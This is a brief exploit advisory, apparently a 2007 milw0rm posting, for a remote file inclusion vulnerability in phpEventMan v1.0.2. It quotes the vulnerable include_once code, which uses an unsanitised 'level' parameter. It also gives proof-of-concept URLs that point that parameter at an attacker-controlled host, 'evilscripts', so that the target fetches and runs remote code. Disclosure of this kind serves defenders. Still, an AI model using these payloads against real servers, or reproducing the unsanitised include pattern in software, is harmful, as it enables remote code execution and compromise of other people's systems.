----------------------------------------------- phpEventMan v1.0.2 (level) Remote File Include Exploit ----------------------------------------------- Author: Cyber-Security cyber-security.org ----------------------------------------------- Code: include_once($level."UserMan/controller/common.function.php"); include_once($level."Shared/sharedfunctions.php"); ----------------------------------------------- POC: www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ? www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ? ----------------------------------------------- download: http://sourceforge.net/project/showfiles.php?group_id=169887 ----------------------------------------------- Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594 # milw0rm.com [2007-02-01]